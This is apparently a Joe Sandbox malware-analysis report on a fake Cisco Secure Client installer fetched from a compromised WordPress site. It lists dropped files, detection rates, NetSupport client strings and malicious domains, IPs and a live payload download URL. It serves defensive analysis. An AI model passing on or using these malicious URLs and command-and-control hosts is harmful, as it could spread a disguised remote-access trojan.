                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\is-6U0C3.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui_toast.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-8PPEF.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-QS498.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\Uninstall.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\VACon64.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\WebView2Loader.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\ac_sock_fltr_api.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscocrypto.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscossl.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\accurl.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\acextwebhelper.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\acfeedback.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\acruntime.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\acsock64.sys (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_chrono.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_date_time.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_filesystem.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_system.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_thread.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\cfom.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\concrt140.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-1IOCC.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-1MCPC.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2OKLO.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2UOIT.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3E159.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3VLKE.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-4ES8I.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-8FFCG.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-8SET5.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-AC64O.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-AQJIS.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-BKRIV.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-C05BP.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D1NAI.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D3PAV.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-DLGKK.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-E1C9T.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-E5841.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-E5LH8.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-EKIDE.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-FBE8U.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-FJD72.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-GT7EB.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-IGGJL.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-IQ59L.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-J44M9.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KBBQU.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KEI9E.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KL0N9.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KNT8U.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-LQ9L3.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-LRKED.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MTMR6.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-OFTU2.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q3KOA.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q5QKO.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-QHSOL.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-R0O6I.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-RH114.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-UHIQE.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_1.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_2.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vccorlib140.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vcruntime140.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagent.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagentutilities.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapi.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapishim.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncli.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommon.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommoncrypt.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpndownloader.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnipsec.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnmgmttun.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnva64-6.sys (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\zlib1.dll (copy)0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\is-577AP.tmp\_isetup\_setup64.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dll3%ReversingLabs
                                  C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLL3%ReversingLabs
                                  C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLL3%ReversingLabs
                                  No Antivirus matches
                                  No Antivirus matches
                                  No Antivirus matches
                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  asknetsupertech.com
                                  54.37.62.77
                                  truetrue
                                    unknown
                                    payiki.com
                                    151.236.16.15
                                    truetrue
                                      unknown
                                      geo.netsupportsoftware.com
                                      172.67.68.212
                                      truefalse
                                        unknown
                                        anyhowdo.com
                                        199.188.200.195
                                        truetrue
                                          unknown
                                          NameMaliciousAntivirus DetectionReputation
                                          http://151.236.16.15/fakeurl.htmtrue
                                            unknown
                                            http://geo.netsupportsoftware.com/location/loca.aspfalse
                                              unknown
                                              http://199.188.200.195/fakeurl.htmtrue
                                                unknown
                                                https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exetrue
                                                  unknown
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://pesterbdd.com/images/Pester.png4powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://www.netsupportsoftware.compowershell.exe, 00000008.00000002.69141328382.00000000056F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUCiscoSetup.exe, 00000005.00000000.68859027882.0000000000A91000.00000020.00000001.01000000.00000003.sdmpfalse
                                                        unknown
                                                        http://%s/testpage.htmwininet.dllpowershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                          unknown
                                                          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)client32.exe, 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                              unknown
                                                              http://ocsp.sectigo.com0powershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://www.pci.co.uk/supportsupportclient32.exe, 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250187547.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330790653.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                  unknown
                                                                  https://contoso.com/Licensepowershell.exe, 00000008.00000002.69152714619.0000000006CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://127.0.0.1RESUMEPRINTINGclient32.exe, 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                      unknown
                                                                      http://%s/testpage.htmpowershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                        unknown
                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://geo.netsupportsoftware.com/location/loca.aspSclient32.exe, 0000000B.00000002.70081065717.0000000000649000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#powershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://www.immunet.comVoorCiscoSetup.tmp, 00000006.00000003.69235227466.0000000005720000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://www.immunet.comPouris-K762I.tmp.6.drfalse
                                                                                  unknown
                                                                                  https://www.openssl.org/is-C05BP.tmp.6.drfalse
                                                                                    unknown
                                                                                    https://ocsp.quovadisoffshore.comwget.exe, wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://%s/fakeurl.htmpowershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                        unknown
                                                                                        https://curl.se/docs/hsts.htmlis-4ES8I.tmp.6.drfalse
                                                                                          unknown
                                                                                          https://github.com/Pester/Pester4powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editwget.exe, 00000002.00000002.68845954829.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://crl.thawte.com/ThawteTimestampingCA.crl0powershell.exe, 00000008.00000002.69141328382.00000000056E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000056F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://geo.netsupportsoftware.com/location/loca.aspYclient32.exe, 0000000B.00000002.70082720696.0000000003250000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://aka.ms/pscore6lBpowershell.exe, 00000008.00000002.69141328382.0000000005251000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://www.remobjects.com/psCiscoSetup.exe, 00000005.00000003.68864558047.000000007E80B000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.exe, 00000005.00000003.68863864836.0000000003050000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000006.00000000.68867343710.0000000000BD1000.00000020.00000001.01000000.00000004.sdmpfalse
                                                                                                      unknown
                                                                                                      https://contoso.com/powershell.exe, 00000008.00000002.69152714619.0000000006CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.69152714619.0000000006CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://www.innosetup.com/CiscoSetup.exe, 00000005.00000003.68864558047.000000007E80B000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.exe, 00000005.00000003.68863864836.0000000003050000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000006.00000000.68867343710.0000000000BD1000.00000020.00000001.01000000.00000004.sdmpfalse
                                                                                                            unknown
                                                                                                            https://sectigo.com/CPS0Dpowershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://www.netsupportschool.com/tutor-assistant.asp11(client32.exe, 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250187547.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330790653.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                                                                unknown
                                                                                                                http://geo.netsupportsoftware.com/location/loca.aspsclient32.exe, 0000000B.00000002.70082720696.0000000003250000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://ocsp.quovadisoffshore.com0wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68845954829.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69137999948.0000000003495000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://www.iminunet.comParaCiscoSetup.tmp, 00000006.00000003.69235227466.0000000005720000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.69141328382.0000000005251000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://www.netsupportschool.com/tutor-assistant.aspclient32.exe, 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250187547.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330790653.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://www.cisco.comCiscoSetup.exe, 00000005.00000003.69255300451.0000000002BB3000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000006.00000003.69247138672.00000000029FC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.69152714619.0000000006CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://www.cisco.com/c/en/us/td/docs/security/vpn_client/anyconnect/anyconnect40/user/guide/b_Androiis-HNAJ2.tmp.6.drfalse
                                                                                                                                unknown
                                                                                                                                http://www.pci.co.uk/supportclient32.exe, 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250187547.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330790653.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://ocsp.quovadisoffshore.com14wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://sectigo.com/CPS0powershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://curl.se/docs/http-cookies.htmlis-4ES8I.tmp.6.drfalse
                                                                                                                                          unknown
                                                                                                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.69141328382.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://ocsp.thawte.com0powershell.exe, 00000008.00000002.69141328382.00000000056E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000056F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://www.immunet.com.CiscoSetup.tmp, 00000006.00000003.69235227466.0000000005720000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://contoso.com/Iconpowershell.exe, 00000008.00000002.69152714619.0000000006CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://www.cisco.com/updateCiscoSetup.exe, 00000005.00000003.69255300451.0000000002BC1000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000006.00000003.69247138672.0000000002A0A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0spowershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://curl.se/docs/alt-svc.htmlis-4ES8I.tmp.6.drfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://127.0.0.1client32.exe, client32.exe, 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://www.immunet.comAbyCiscoSetup.tmp, 00000006.00000003.69235227466.0000000005720000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://www.symauth.com/cps0(powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.drfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.html4powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ypowershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://www.symauth.com/rpa00powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.drfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://www.iminunet.comCiscoSetup.tmp, 00000006.00000003.69235227466.0000000005720000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://www.immunet.comis-K762I.tmp.6.dr, is-HNAJ2.tmp.6.drfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.69141328382.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeeDrivwget.exe, 00000002.00000002.68846552333.00000000012F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://www.cisco.com0is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://www.quovadis.bmwget.exe, wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://www.quovadis.bm0wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68845954829.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69137999948.0000000003495000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://geo.netsupportsoftware.com/location/loca.asp5client32.exe, 0000000B.00000003.69437076663.00000000056F6000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.70083577485.00000000056F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://www.cisco.com/supportCiscoSetup.exe, 00000005.00000003.69255300451.0000000002BC1000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000006.00000003.69247138672.0000000002A0A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://www.immunet.comAis-NL2AM.tmp.6.drfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                  54.37.62.77
                                                                                                                                                                                                  asknetsupertech.comFrance
                                                                                                                                                                                                  16276OVHFRtrue
                                                                                                                                                                                                  172.67.68.212
                                                                                                                                                                                                  geo.netsupportsoftware.comUnited States
                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                  151.236.16.15
                                                                                                                                                                                                  payiki.comEuropean Union
                                                                                                                                                                                                  29802HVC-ASUStrue
                                                                                                                                                                                                  199.188.200.195
                                                                                                                                                                                                  anyhowdo.comUnited States
                                                                                                                                                                                                  22612NAMECHEAP-NETUStrue
                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                  Analysis ID:1546280
                                                                                                                                                                                                  Start date and time:2024-10-31 18:03:10 +01:00
                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                  Overall analysis duration:0h 11m 42s
                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                  Cookbook file name:urldownload.jbs
                                                                                                                                                                                                  Sample URL:https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe
                                                                                                                                                                                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                                                  Number of analysed new started processes analysed:14
                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                  Analysis Mode:default
